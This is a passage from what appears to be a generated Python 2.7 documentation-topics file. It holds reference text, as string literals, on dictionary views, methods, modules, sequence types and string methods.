keys. See below " 'for\n' ' documentation of view objects.\n' '\n' ' New in version 2.7.\n' '\n' ' viewvalues()\n' '\n' " Return a new view of the dictionary's values. See " 'below for\n' ' documentation of view objects.\n' '\n' ' New in version 2.7.\n' '\n' ' Dictionaries compare equal if and only if they have the ' 'same "(key,\n' ' value)" pairs.\n' '\n' '\n' 'Dictionary view objects\n' '=======================\n' '\n' 'The objects returned by "dict.viewkeys()", ' '"dict.viewvalues()" and\n' '"dict.viewitems()" are *view objects*. 
They provide a ' 'dynamic view on\n' "the dictionary's entries, which means that when the " 'dictionary\n' 'changes, the view reflects these changes.\n' '\n' 'Dictionary views can be iterated over to yield their ' 'respective data,\n' 'and support membership tests:\n' '\n' 'len(dictview)\n' '\n' ' Return the number of entries in the dictionary.\n' '\n' 'iter(dictview)\n' '\n' ' Return an iterator over the keys, values or items ' '(represented as\n' ' tuples of "(key, value)") in the dictionary.\n' '\n' ' Keys and values are iterated over in an arbitrary order ' 'which is\n' ' non-random, varies across Python implementations, and ' 'depends on\n' " the dictionary's history of insertions and deletions. If " 'keys,\n' ' values and items views are iterated over with no ' 'intervening\n' ' modifications to the dictionary, the order of items will ' 'directly\n' ' correspond. This allows the creation of "(value, key)" ' 'pairs using\n' ' "zip()": "pairs = zip(d.values(), d.keys())". Another ' 'way to\n' ' create the same list is "pairs = [(v, k) for (k, v) in ' 'd.items()]".\n' '\n' ' Iterating views while adding or deleting entries in the ' 'dictionary\n' ' may raise a "RuntimeError" or fail to iterate over all ' 'entries.\n' '\n' 'x in dictview\n' '\n' ' Return "True" if *x* is in the underlying dictionary\'s ' 'keys, values\n' ' or items (in the latter case, *x* should be a "(key, ' 'value)"\n' ' tuple).\n' '\n' 'Keys views are set-like since their entries are unique and ' 'hashable.\n' 'If all values are hashable, so that (key, value) pairs are ' 'unique and\n' 'hashable, then the items view is also set-like. (Values ' 'views are not\n' 'treated as set-like since the entries are generally not ' 'unique.) 
Then\n' 'these set operations are available ("other" refers either to ' 'another\n' 'view or a set):\n' '\n' 'dictview & other\n' '\n' ' Return the intersection of the dictview and the other ' 'object as a\n' ' new set.\n' '\n' 'dictview | other\n' '\n' ' Return the union of the dictview and the other object as ' 'a new set.\n' '\n' 'dictview - other\n' '\n' ' Return the difference between the dictview and the other ' 'object\n' " (all elements in *dictview* that aren't in *other*) as a " 'new set.\n' '\n' 'dictview ^ other\n' '\n' ' Return the symmetric difference (all elements either in ' '*dictview*\n' ' or *other*, but not in both) of the dictview and the ' 'other object\n' ' as a new set.\n' '\n' 'An example of dictionary view usage:\n' '\n' " >>> dishes = {'eggs': 2, 'sausage': 1, 'bacon': 1, " "'spam': 500}\n" ' >>> keys = dishes.viewkeys()\n' ' >>> values = dishes.viewvalues()\n' '\n' ' >>> # iteration\n' ' >>> n = 0\n' ' >>> for val in values:\n' ' ... n += val\n' ' >>> print(n)\n' ' 504\n' '\n' ' >>> # keys and values are iterated over in the same ' 'order\n' ' >>> list(keys)\n' " ['eggs', 'bacon', 'sausage', 'spam']\n" ' >>> list(values)\n' ' [2, 1, 1, 500]\n' '\n' ' >>> # view objects are dynamic and reflect dict changes\n' " >>> del dishes['eggs']\n" " >>> del dishes['sausage']\n" ' >>> list(keys)\n' " ['spam', 'bacon']\n" '\n' ' >>> # set operations\n' " >>> keys & {'eggs', 'bacon', 'salad'}\n" " {'bacon'}\n", 'typesmethods': '\n' 'Methods\n' '*******\n' '\n' 'Methods are functions that are called using the attribute ' 'notation.\n' 'There are two flavors: built-in methods (such as "append()" ' 'on lists)\n' 'and class instance methods. 
Built-in methods are described ' 'with the\n' 'types that support them.\n' '\n' 'The implementation adds two special read-only attributes to ' 'class\n' 'instance methods: "m.im_self" is the object on which the ' 'method\n' 'operates, and "m.im_func" is the function implementing the ' 'method.\n' 'Calling "m(arg-1, arg-2, ..., arg-n)" is completely ' 'equivalent to\n' 'calling "m.im_func(m.im_self, arg-1, arg-2, ..., arg-n)".\n' '\n' 'Class instance methods are either *bound* or *unbound*, ' 'referring to\n' 'whether the method was accessed through an instance or a ' 'class,\n' 'respectively. When a method is unbound, its "im_self" ' 'attribute will\n' 'be "None" and if called, an explicit "self" object must be ' 'passed as\n' 'the first argument. In this case, "self" must be an ' 'instance of the\n' "unbound method's class (or a subclass of that class), " 'otherwise a\n' '"TypeError" is raised.\n' '\n' 'Like function objects, methods objects support getting ' 'arbitrary\n' 'attributes. However, since method attributes are actually ' 'stored on\n' 'the underlying function object ("meth.im_func"), setting ' 'method\n' 'attributes on either bound or unbound methods is ' 'disallowed.\n' 'Attempting to set an attribute on a method results in an\n' '"AttributeError" being raised. In order to set a method ' 'attribute,\n' 'you need to explicitly set it on the underlying function ' 'object:\n' '\n' ' >>> class C:\n' ' ... def method(self):\n' ' ... 
pass\n' ' ...\n' ' >>> c = C()\n' " >>> c.method.whoami = 'my name is method' # can't set on " 'the method\n' ' Traceback (most recent call last):\n' ' File "<stdin>", line 1, in <module>\n' " AttributeError: 'instancemethod' object has no attribute " "'whoami'\n" " >>> c.method.im_func.whoami = 'my name is method'\n" ' >>> c.method.whoami\n' " 'my name is method'\n" '\n' 'See The standard type hierarchy for more information.\n', 'typesmodules': '\n' 'Modules\n' '*******\n' '\n' 'The only special operation on a module is attribute access: ' '"m.name",\n' 'where *m* is a module and *name* accesses a name defined in ' "*m*'s\n" 'symbol table. Module attributes can be assigned to. (Note ' 'that the\n' '"import" statement is not, strictly speaking, an operation ' 'on a module\n' 'object; "import foo" does not require a module object named ' '*foo* to\n' 'exist, rather it requires an (external) *definition* for a ' 'module\n' 'named *foo* somewhere.)\n' '\n' 'A special attribute of every module is "__dict__". This is ' 'the\n' "dictionary containing the module's symbol table. Modifying " 'this\n' "dictionary will actually change the module's symbol table, " 'but direct\n' 'assignment to the "__dict__" attribute is not possible (you ' 'can write\n' '"m.__dict__[\'a\'] = 1", which defines "m.a" to be "1", but ' "you can't\n" 'write "m.__dict__ = {}"). Modifying "__dict__" directly is ' 'not\n' 'recommended.\n' '\n' 'Modules built into the interpreter are written like this: ' '"<module\n' '\'sys\' (built-in)>". 
If loaded from a file, they are ' 'written as\n' '"<module \'os\' from ' '\'/usr/local/lib/pythonX.Y/os.pyc\'>".\n', 'typesseq': '\n' 'Sequence Types --- "str", "unicode", "list", "tuple", ' '"bytearray", "buffer", "xrange"\n' '*************************************************************************************\n' '\n' 'There are seven sequence types: strings, Unicode strings, ' 'lists,\n' 'tuples, bytearrays, buffers, and xrange objects.\n' '\n' 'For other containers see the built in "dict" and "set" classes, ' 'and\n' 'the "collections" module.\n' '\n' 'String literals are written in single or double quotes: ' '"\'xyzzy\'",\n' '""frobozz"". See String literals for more about string ' 'literals.\n' 'Unicode strings are much like strings, but are specified in the ' 'syntax\n' 'using a preceding "\'u\'" character: "u\'abc\'", "u"def"". In ' 'addition to\n' 'the functionality described here, there are also ' 'string-specific\n' 'methods described in the String Methods section. Lists are ' 'constructed\n' 'with square brackets, separating items with commas: "[a, b, ' 'c]".\n' 'Tuples are constructed by the comma operator (not within square\n' 'brackets), with or without enclosing parentheses, but an empty ' 'tuple\n' 'must have the enclosing parentheses, such as "a, b, c" or "()". ' 'A\n' 'single item tuple must have a trailing comma, such as "(d,)".\n' '\n' 'Bytearray objects are created with the built-in function\n' '"bytearray()".\n' '\n' 'Buffer objects are not directly supported by Python syntax, but ' 'can be\n' 'created by calling the built-in function "buffer()". They ' "don't\n" 'support concatenation or repetition.\n' '\n' 'Objects of type xrange are similar to buffers in that there is ' 'no\n' 'specific syntax to create them, but they are created using the\n' '"xrange()" function. 
They don\'t support slicing, concatenation ' 'or\n' 'repetition, and using "in", "not in", "min()" or "max()" on them ' 'is\n' 'inefficient.\n' '\n' 'Most sequence types support the following operations. The "in" ' 'and\n' '"not in" operations have the same priorities as the comparison\n' 'operations. The "+" and "*" operations have the same priority ' 'as the\n' 'corresponding numeric operations. [3] Additional methods are ' 'provided\n' 'for Mutable Sequence Types.\n' '\n' 'This table lists the sequence operations sorted in ascending ' 'priority.\n' 'In the table, *s* and *t* are sequences of the same type; *n*, ' '*i* and\n' '*j* are integers:\n' '\n' '+--------------------+----------------------------------+------------+\n' '| Operation | Result | ' 'Notes |\n' '+====================+==================================+============+\n' '| "x in s" | "True" if an item of *s* is | ' '(1) |\n' '| | equal to *x*, else "False" ' '| |\n' '+--------------------+----------------------------------+------------+\n' '| "x not in s" | "False" if an item of *s* is | ' '(1) |\n' '| | equal to *x*, else "True" ' '| |\n' '+--------------------+----------------------------------+------------+\n' '| "s + t" | the concatenation of *s* and *t* | ' '(6) |\n' '+--------------------+----------------------------------+------------+\n' '| "s * n, n * s" | equivalent to adding *s* to | ' '(2) |\n' '| | itself *n* times ' '| |\n' '+--------------------+----------------------------------+------------+\n' '| "s[i]" | *i*th item of *s*, origin 0 | ' '(3) |\n' '+--------------------+----------------------------------+------------+\n' '| "s[i:j]" | slice of *s* from *i* to *j* | ' '(3)(4) |\n' '+--------------------+----------------------------------+------------+\n' '| "s[i:j:k]" | slice of *s* from *i* to *j* | ' '(3)(5) |\n' '| | with step *k* ' '| |\n' '+--------------------+----------------------------------+------------+\n' '| "len(s)" | length of *s* ' '| |\n' 
'+--------------------+----------------------------------+------------+\n' '| "min(s)" | smallest item of *s* ' '| |\n' '+--------------------+----------------------------------+------------+\n' '| "max(s)" | largest item of *s* ' '| |\n' '+--------------------+----------------------------------+------------+\n' '| "s.index(x)" | index of the first occurrence of ' '| |\n' '| | *x* in *s* ' '| |\n' '+--------------------+----------------------------------+------------+\n' '| "s.count(x)" | total number of occurrences of ' '| |\n' '| | *x* in *s* ' '| |\n' '+--------------------+----------------------------------+------------+\n' '\n' 'Sequence types also support comparisons. In particular, tuples ' 'and\n' 'lists are compared lexicographically by comparing corresponding\n' 'elements. This means that to compare equal, every element must ' 'compare\n' 'equal and the two sequences must be of the same type and have ' 'the same\n' 'length. (For full details see Comparisons in the language ' 'reference.)\n' '\n' 'Notes:\n' '\n' '1. When *s* is a string or Unicode string object the "in" and ' '"not\n' ' in" operations act like a substring test. In Python ' 'versions\n' ' before 2.3, *x* had to be a string of length 1. In Python 2.3 ' 'and\n' ' beyond, *x* may be a string of any length.\n' '\n' '2. Values of *n* less than "0" are treated as "0" (which yields ' 'an\n' ' empty sequence of the same type as *s*). Note that items in ' 'the\n' ' sequence *s* are not copied; they are referenced multiple ' 'times.\n' ' This often haunts new Python programmers; consider:\n' '\n' ' >>> lists = [[]] * 3\n' ' >>> lists\n' ' [[], [], []]\n' ' >>> lists[0].append(3)\n' ' >>> lists\n' ' [[3], [3], [3]]\n' '\n' ' What has happened is that "[[]]" is a one-element list ' 'containing\n' ' an empty list, so all three elements of "[[]] * 3" are ' 'references\n' ' to this single empty list. Modifying any of the elements of\n' ' "lists" modifies this single list. 
You can create a list of\n' ' different lists this way:\n' '\n' ' >>> lists = [[] for i in range(3)]\n' ' >>> lists[0].append(3)\n' ' >>> lists[1].append(5)\n' ' >>> lists[2].append(7)\n' ' >>> lists\n' ' [[3], [5], [7]]\n' '\n' ' Further explanation is available in the FAQ entry How do I ' 'create a\n' ' multidimensional list?.\n' '\n' '3. If *i* or *j* is negative, the index is relative to the end ' 'of\n' ' the string: "len(s) + i" or "len(s) + j" is substituted. But ' 'note\n' ' that "-0" is still "0".\n' '\n' '4. The slice of *s* from *i* to *j* is defined as the sequence ' 'of\n' ' items with index *k* such that "i <= k < j". If *i* or *j* ' 'is\n' ' greater than "len(s)", use "len(s)". If *i* is omitted or ' '"None",\n' ' use "0". If *j* is omitted or "None", use "len(s)". If *i* ' 'is\n' ' greater than or equal to *j*, the slice is empty.\n' '\n' '5. The slice of *s* from *i* to *j* with step *k* is defined as ' 'the\n' ' sequence of items with index "x = i + n*k" such that "0 <= n ' '<\n' ' (j-i)/k". In other words, the indices are "i", "i+k", ' '"i+2*k",\n' ' "i+3*k" and so on, stopping when *j* is reached (but never\n' ' including *j*). If *i* or *j* is greater than "len(s)", use\n' ' "len(s)". If *i* or *j* are omitted or "None", they become ' '"end"\n' ' values (which end depends on the sign of *k*). Note, *k* ' 'cannot be\n' ' zero. If *k* is "None", it is treated like "1".\n' '\n' '6. **CPython implementation detail:** If *s* and *t* are both\n' ' strings, some Python implementations such as CPython can ' 'usually\n' ' perform an in-place optimization for assignments of the form ' '"s = s\n' ' + t" or "s += t". When applicable, this optimization makes\n' ' quadratic run-time much less likely. This optimization is ' 'both\n' ' version and implementation dependent. 
For performance ' 'sensitive\n' ' code, it is preferable to use the "str.join()" method which ' 'assures\n' ' consistent linear concatenation performance across versions ' 'and\n' ' implementations.\n' '\n' ' Changed in version 2.4: Formerly, string concatenation never\n' ' occurred in-place.\n' '\n' '\n' 'String Methods\n' '==============\n' '\n' 'Below are listed the string methods which both 8-bit strings ' 'and\n' 'Unicode objects support. Some of them are also available on\n' '"bytearray" objects.\n' '\n' "In addition, Python's strings support the sequence type methods\n" 'described in the Sequence Types --- str, unicode, list, tuple,\n' 'bytearray, buffer, xrange section. To output formatted strings ' 'use\n' 'template strings or the "%" operator described in the String\n' 'Formatting Operations section. Also, see the "re" module for ' 'string\n' 'functions based on regular expressions.\n' '\n' 'str.capitalize()\n' '\n' ' Return a copy of the string with its first character ' 'capitalized\n' ' and the rest lowercased.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.center(width[, fillchar])\n' '\n' ' Return centered in a string of length *width*. Padding is ' 'done\n' ' using the specified *fillchar* (default is a space).\n' '\n' ' Changed in version 2.4: Support for the *fillchar* argument.\n' '\n' 'str.count(sub[, start[, end]])\n' '\n' ' Return the number of non-overlapping occurrences of substring ' '*sub*\n' ' in the range [*start*, *end*]. Optional arguments *start* ' 'and\n' ' *end* are interpreted as in slice notation.\n' '\n' 'str.decode([encoding[, errors]])\n' '\n' ' Decodes the string using the codec registered for ' '*encoding*.\n' ' *encoding* defaults to the default string encoding. *errors* ' 'may\n' ' be given to set a different error handling scheme. 
The ' 'default is\n' ' "\'strict\'", meaning that encoding errors raise ' '"UnicodeError".\n' ' Other possible values are "\'ignore\'", "\'replace\'" and any ' 'other\n' ' name registered via "codecs.register_error()", see section ' 'Codec\n' ' Base Classes.\n' '\n' ' New in version 2.2.\n' '\n' ' Changed in version 2.3: Support for other error handling ' 'schemes\n' ' added.\n' '\n' ' Changed in version 2.7: Support for keyword arguments added.\n' '\n' 'str.encode([encoding[, errors]])\n' '\n' ' Return an encoded version of the string. Default encoding is ' 'the\n' ' current default string encoding. *errors* may be given to ' 'set a\n' ' different error handling scheme. The default for *errors* ' 'is\n' ' "\'strict\'", meaning that encoding errors raise a ' '"UnicodeError".\n' ' Other possible values are "\'ignore\'", "\'replace\'",\n' ' "\'xmlcharrefreplace\'", "\'backslashreplace\'" and any other ' 'name\n' ' registered via "codecs.register_error()", see section Codec ' 'Base\n' ' Classes. For a list of possible encodings, see section ' 'Standard\n' ' Encodings.\n' '\n' ' New in version 2.0.\n' '\n' ' Changed in version 2.3: Support for "\'xmlcharrefreplace\'" ' 'and\n' ' "\'backslashreplace\'" and other error handling schemes ' 'added.\n' '\n' ' Changed in version 2.7: Support for keyword arguments added.\n' '\n' 'str.endswith(suffix[, start[, end]])\n' '\n' ' Return "True" if the string ends with the specified ' '*suffix*,\n' ' otherwise return "False". *suffix* can also be a tuple of ' 'suffixes\n' ' to look for. With optional *start*, test beginning at that\n' ' position. With optional *end*, stop comparing at that ' 'position.\n' '\n' ' Changed in version 2.5: Accept tuples as *suffix*.\n' '\n' 'str.expandtabs([tabsize])\n' '\n' ' Return a copy of the string where all tab characters are ' 'replaced\n' ' by one or more spaces, depending on the current column and ' 'the\n' ' given tab size. 
Tab positions occur every *tabsize* ' 'characters\n' ' (default is 8, giving tab positions at columns 0, 8, 16 and ' 'so on).\n' ' To expand the string, the current column is set to zero and ' 'the\n' ' string is examined character by character. If the character ' 'is a\n' ' tab ("\\t"), one or more space characters are inserted in the ' 'result\n' ' until the current column is equal to the next tab position. ' '(The\n' ' tab character itself is not copied.) If the character is a ' 'newline\n' ' ("\\n") or return ("\\r"), it is copied and the current ' 'column is\n' ' reset to zero. Any other character is copied unchanged and ' 'the\n' ' current column is incremented by one regardless of how the\n' ' character is represented when printed.\n' '\n' " >>> '01\\t012\\t0123\\t01234'.expandtabs()\n" " '01 012 0123 01234'\n" " >>> '01\\t012\\t0123\\t01234'.expandtabs(4)\n" " '01 012 0123 01234'\n" '\n' 'str.find(sub[, start[, end]])\n' '\n' ' Return the lowest index in the string where substring *sub* ' 'is\n' ' found within the slice "s[start:end]". Optional arguments ' '*start*\n' ' and *end* are interpreted as in slice notation. Return "-1" ' 'if\n' ' *sub* is not found.\n' '\n' ' Note: The "find()" method should be used only if you need to ' 'know\n' ' the position of *sub*. To check if *sub* is a substring or ' 'not,\n' ' use the "in" operator:\n' '\n' " >>> 'Py' in 'Python'\n" ' True\n' '\n' 'str.format(*args, **kwargs)\n' '\n' ' Perform a string formatting operation. The string on which ' 'this\n' ' method is called can contain literal text or replacement ' 'fields\n' ' delimited by braces "{}". Each replacement field contains ' 'either\n' ' the numeric index of a positional argument, or the name of a\n' ' keyword argument. 
Returns a copy of the string where each\n' ' replacement field is replaced with the string value of the\n' ' corresponding argument.\n' '\n' ' >>> "The sum of 1 + 2 is {0}".format(1+2)\n' " 'The sum of 1 + 2 is 3'\n" '\n' ' See Format String Syntax for a description of the various\n' ' formatting options that can be specified in format strings.\n' '\n' ' This method of string formatting is the new standard in ' 'Python 3,\n' ' and should be preferred to the "%" formatting described in ' 'String\n' ' Formatting Operations in new code.\n' '\n' ' New in version 2.6.\n' '\n' 'str.index(sub[, start[, end]])\n' '\n' ' Like "find()", but raise "ValueError" when the substring is ' 'not\n' ' found.\n' '\n' 'str.isalnum()\n' '\n' ' Return true if all characters in the string are alphanumeric ' 'and\n' ' there is at least one character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.isalpha()\n' '\n' ' Return true if all characters in the string are alphabetic ' 'and\n' ' there is at least one character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.isdigit()\n' '\n' ' Return true if all characters in the string are digits and ' 'there is\n' ' at least one character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.islower()\n' '\n' ' Return true if all cased characters [4] in the string are ' 'lowercase\n' ' and there is at least one cased character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.isspace()\n' '\n' ' Return true if there are only whitespace characters in the ' 'string\n' ' and there is at least one character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.istitle()\n' '\n' ' Return true if the string is a titlecased string and there is ' 'at\n' ' least one character, for example uppercase characters may ' 'only\n' ' follow uncased 
characters and lowercase characters only cased ' 'ones.\n' ' Return false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.isupper()\n' '\n' ' Return true if all cased characters [4] in the string are ' 'uppercase\n' ' and there is at least one cased character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.join(iterable)\n' '\n' ' Return a string which is the concatenation of the strings in ' 'the\n' ' *iterable* *iterable*. The separator between elements is ' 'the\n' ' string providing this method.\n' '\n' 'str.ljust(width[, fillchar])\n' '\n' ' Return the string left justified in a string of length ' '*width*.\n' ' Padding is done using the specified *fillchar* (default is a\n' ' space). The original string is returned if *width* is less ' 'than or\n' ' equal to "len(s)".\n' '\n' ' Changed in version 2.4: Support for the *fillchar* argument.\n' '\n' 'str.lower()\n' '\n' ' Return a copy of the string with all the cased characters ' '[4]\n' ' converted to lowercase.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.lstrip([chars])\n' '\n' ' Return a copy of the string with leading characters removed. ' 'The\n' ' *chars* argument is a string specifying the set of characters ' 'to be\n' ' removed. If omitted or "None", the *chars* argument defaults ' 'to\n' ' removing whitespace. The *chars* argument is not a prefix; ' 'rather,\n' ' all combinations of its values are stripped:\n' '\n' " >>> ' spacious '.lstrip()\n" " 'spacious '\n" " >>> 'www.example.com'.lstrip('cmowz.')\n" " 'example.com'\n" '\n' ' Changed in version 2.2.2: Support for the *chars* argument.\n' '\n' 'str.partition(sep)\n' '\n' ' Split the string at the first occurrence of *sep*, and return ' 'a\n' ' 3-tuple containing the part before the separator, the ' 'separator\n' ' itself, and the part after the separator. 
If the separator ' 'is not\n' ' found, return a 3-tuple containing the string itself, ' 'followed by\n' ' two empty strings.\n' '\n' ' New in version 2.5.\n' '\n' 'str.replace(old, new[, count])\n' '\n' ' Return a copy of the string with all occurrences of substring ' '*old*\n' ' replaced by *new*. If the optional argument *count* is ' 'given, only\n' ' the first *count* occurrences are replaced.\n' '\n' 'str.rfind(sub[, start[, end]])\n' '\n' ' Return the highest index in the string where substring *sub* ' 'is\n' ' found, such that *sub* is contained within "s[start:end]".\n' ' Optional arguments *start* and *end* are interpreted as in ' 'slice\n' ' notation. Return "-1" on failure.\n' '\n' 'str.rindex(sub[, start[, end]])\n' '\n' ' Like "rfind()" but raises "ValueError" when the substring ' '*sub* is\n' ' not found.\n' '\n' 'str.rjust(width[, fillchar])\n' '\n' ' Return the string right justified in a string of length ' '*width*.\n' ' Padding is done using the specified *fillchar* (default is a\n' ' space). The original string is returned if *width* is less ' 'than or\n' ' equal to "len(s)".\n' '\n' ' Changed in version 2.4: Support for the *fillchar* argument.\n' '\n' 'str.rpartition(sep)\n' '\n' ' Split the string at the last occurrence of *sep*, and return ' 'a\n' ' 3-tuple containing the part before the separator, the ' 'separator\n' ' itself, and the part after the separator. If the separator ' 'is not\n' ' found, return a 3-tuple containing two empty strings, ' 'followed by\n' ' the string itself.\n' '\n' ' New in version 2.5.\n' '\n' 'str.rsplit([sep[, maxsplit]])\n' '\n' ' Return a list of the words in the string, using *sep* as the\n' ' delimiter string. If *maxsplit* is given, at most *maxsplit* ' 'splits\n' ' are done, the *rightmost* ones. If *sep* is not specified ' 'or\n' ' "None", any whitespace string is a separator. 
Except for ' 'splitting\n' ' from the right, "rsplit()" behaves like "split()" which is\n' ' described in detail below.\n' '\n' ' New in version 2.4.\n' '\n' 'str.rstrip([chars])\n' '\n' ' Return a copy of the string with trailing characters ' 'removed. The\n' ' *chars* argument is a string specifying the set of characters ' 'to be\n' ' removed. If omitted or "None", the *chars* argument defaults ' 'to\n' ' removing whitespace. The *chars* argument is not a suffix; ' 'rather,\n' ' all combinations of its values are stripped:\n' '\n' " >>> ' spacious '.rstrip()\n" " ' spacious'\n" " >>> 'mississippi'.rstrip('ipz')\n" " 'mississ'\n" '\n' ' Changed in version 2.2.2: Support for the *chars* argument.\n' '\n' 'str.split([sep[, maxsplit]])\n' '\n' ' Return a list of the words in the string, using *sep* as the\n' ' delimiter string. If *maxsplit* is given, at most ' '*maxsplit*\n' ' splits are done (thus, the list will have at most ' '"maxsplit+1"\n' ' elements). If *maxsplit* is not specified or "-1", then ' 'there is\n' ' no limit on the number of splits (all possible splits are ' 'made).\n' '\n' ' If *sep* is given, consecutive delimiters are not grouped ' 'together\n' ' and are deemed to delimit empty strings (for example,\n' ' "\'1,,2\'.split(\',\')" returns "[\'1\', \'\', \'2\']"). The ' '*sep* argument\n' ' may consist of multiple characters (for example,\n' ' "\'1<>2<>3\'.split(\'<>\')" returns "[\'1\', \'2\', \'3\']"). ' 'Splitting an\n' ' empty string with a specified separator returns "[\'\']".\n' '\n' ' If *sep* is not specified or is "None", a different ' 'splitting\n' ' algorithm is applied: runs of consecutive whitespace are ' 'regarded\n' ' as a single separator, and the result will contain no empty ' 'strings\n' ' at the start or end if the string has leading or trailing\n' ' whitespace. 
Consequently, splitting an empty string or a ' 'string\n' ' consisting of just whitespace with a "None" separator returns ' '"[]".\n' '\n' ' For example, "\' 1 2 3 \'.split()" returns "[\'1\', ' '\'2\', \'3\']", and\n' ' "\' 1 2 3 \'.split(None, 1)" returns "[\'1\', \'2 3 ' '\']".\n' '\n' 'str.splitlines([keepends])\n' '\n' ' Return a list of the lines in the string, breaking at line\n' ' boundaries. This method uses the *universal newlines* ' 'approach to\n' ' splitting lines. Line breaks are not included in the ' 'resulting list\n' ' unless *keepends* is given and true.\n' '\n' ' For example, "\'ab c\\n\\nde fg\\rkl\\r\\n\'.splitlines()" ' 'returns "[\'ab\n' ' c\', \'\', \'de fg\', \'kl\']", while the same call with\n' ' "splitlines(True)" returns "[\'ab c\\n\', \'\\n\', \'de ' 'fg\\r\', \'kl\\r\\n\']".\n' '\n' ' Unlike "split()" when a delimiter string *sep* is given, ' 'this\n' ' method returns an empty list for the empty string, and a ' 'terminal\n' ' line break does not result in an extra line.\n' '\n' 'str.startswith(prefix[, start[, end]])\n' '\n' ' Return "True" if string starts with the *prefix*, otherwise ' 'return\n' ' "False". *prefix* can also be a tuple of prefixes to look ' 'for.\n' ' With optional *start*, test string beginning at that ' 'position.\n' ' With optional *end*, stop comparing string at that position.\n' '\n' ' Changed in version 2.5: Accept tuples as *prefix*.\n' '\n' 'str.strip([chars])\n' '\n' ' Return a copy of the string with the leading and trailing\n' ' characters removed. The *chars* argument is a string ' 'specifying the\n' ' set of characters to be removed. If omitted or "None", the ' '*chars*\n' ' argument defaults to removing whitespace. 
The *chars* ' 'argument is\n' ' not a prefix or suffix; rather, all combinations of its ' 'values are\n' ' stripped:\n' '\n' " >>> ' spacious '.strip()\n" " 'spacious'\n" " >>> 'www.example.com'.strip('cmowz.')\n" " 'example'\n" '\n' ' Changed in version 2.2.2: Support for the *chars* argument.\n' '\n' 'str.swapcase()\n' '\n' ' Return a copy of the string with uppercase characters ' 'converted to\n' ' lowercase and vice versa.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.title()\n' '\n' ' Return a titlecased version of the string where words start ' 'with an\n' ' uppercase character and the remaining characters are ' 'lowercase.\n' '\n' ' The algorithm uses a simple language-independent definition ' 'of a\n' ' word as groups of consecutive letters. The definition works ' 'in\n' ' many contexts but it means that apostrophes in contractions ' 'and\n' ' possessives form word boundaries, which may not be the ' 'desired\n' ' result:\n' '\n' ' >>> "they\'re bill\'s friends from the UK".title()\n' ' "They\'Re Bill\'S Friends From The Uk"\n' '\n' ' A workaround for apostrophes can be constructed using ' 'regular\n' ' expressions:\n' '\n' ' >>> import re\n' ' >>> def titlecase(s):\n' ' ... return re.sub(r"[A-Za-z]+(\'[A-Za-z]+)?",\n' ' ... lambda mo: mo.group(0)[0].upper() +\n' ' ... mo.group(0)[1:].lower(),\n' ' ... s)\n' ' ...\n' ' >>> titlecase("they\'re bill\'s friends.")\n' ' "They\'re Bill\'s Friends."\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.translate(table[, deletechars])\n' '\n' ' Return a copy of the string where all characters occurring in ' 'the\n' ' optional argument *deletechars* are removed, and the ' 'remaining\n' ' characters have been mapped through the given translation ' 'table,\n' ' which must be a string of length 256.\n' '\n' ' You can use the "maketrans()" helper function in the ' '"string"\n' ' module to create a translation table. 
For string objects, set ' 'the\n' ' *table* argument to "None" for translations that only delete\n' ' characters:\n' '\n' " >>> 'read this short text'.translate(None, 'aeiou')\n" " 'rd ths shrt txt'\n" '\n' ' New in version 2.6: Support for a "None" *table* argument.\n' '\n' ' For Unicode objects, the "translate()" method does not accept ' 'the\n' ' optional *deletechars* argument. Instead, it returns a copy ' 'of the\n' ' *s* where all characters have been mapped through the given\n' ' translation table which must be a mapping of Unicode ordinals ' 'to\n' ' Unicode ordinals, Unicode strings or "None". Unmapped ' 'characters\n' ' are left untouched. Characters mapped to "None" are deleted. ' 'Note,\n' ' a more flexible approach is to create a custom character ' 'mapping\n' ' codec using the "codecs" module (see "encodings.cp1251" for ' 'an\n' ' example).\n' '\n' 'str.upper()\n' '\n' ' Return a copy of the string with all the cased characters ' '[4]\n' ' converted to uppercase. Note that "str.upper().isupper()" ' 'might be\n' ' "False" if "s" contains uncased characters or if the Unicode\n' ' category of the resulting character(s) is not "Lu" (Letter,\n' ' uppercase), but e.g. "Lt" (Letter, titlecase).\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.zfill(width)\n' '\n' ' Return the numeric string left filled with zeros in a string ' 'of\n' ' length *width*. A sign prefix is handled correctly. The ' 'original\n' ' string is returned if *width* is less than or equal to ' '"len(s)".\n' '\n' ' New in version 2.2.2.\n' '\n' 'The following methods are present only on unicode objects:\n' '\n' 'unicode.isnumeric()\n' '\n' ' Return "True" if there are only numeric characters in S, ' '"False"\n' ' otherwise. 
Numeric characters include digit characters, and ' 'all\n' ' characters that have the Unicode numeric value property, ' 'e.g.\n' ' U+2155, VULGAR FRACTION ONE FIFTH.\n' '\n' 'unicode.isdecimal()\n' '\n' ' Return "True" if there are only decimal characters in S, ' '"False"\n' ' otherwise. Decimal characters include digit characters, and ' 'all\n' ' characters that can be used to form decimal-radix numbers, ' 'e.g.\n' ' U+0660, ARABIC-INDIC DIGIT ZERO.\n' '\n' '\n' 'String Formatting Operations\n' '============================\n' '\n' 'String and Unicode objects have one unique built-in operation: ' 'the "%"\n' 'operator (modulo). This is also known as the string ' '*formatting* or\n' '*interpolation* operator. Given "format % values" (where ' '*format* is\n' 'a string or Unicode object), "%" conversion specifications in ' '*format*\n' 'are replaced with zero or more elements of *values*. The effect ' 'is\n' 'similar to the using "sprintf()" in the C language. If *format* ' 'is a\n' 'Unicode object, or if any of the objects being converted using ' 'the\n' '"%s" conversion are Unicode objects, the result will also be a ' 'Unicode\n' 'object.\n' '\n' 'If *format* requires a single argument, *values* may be a single ' 'non-\n' 'tuple object. [5] Otherwise, *values* must be a tuple with ' 'exactly\n' 'the number of items specified by the format string, or a single\n' 'mapping object (for example, 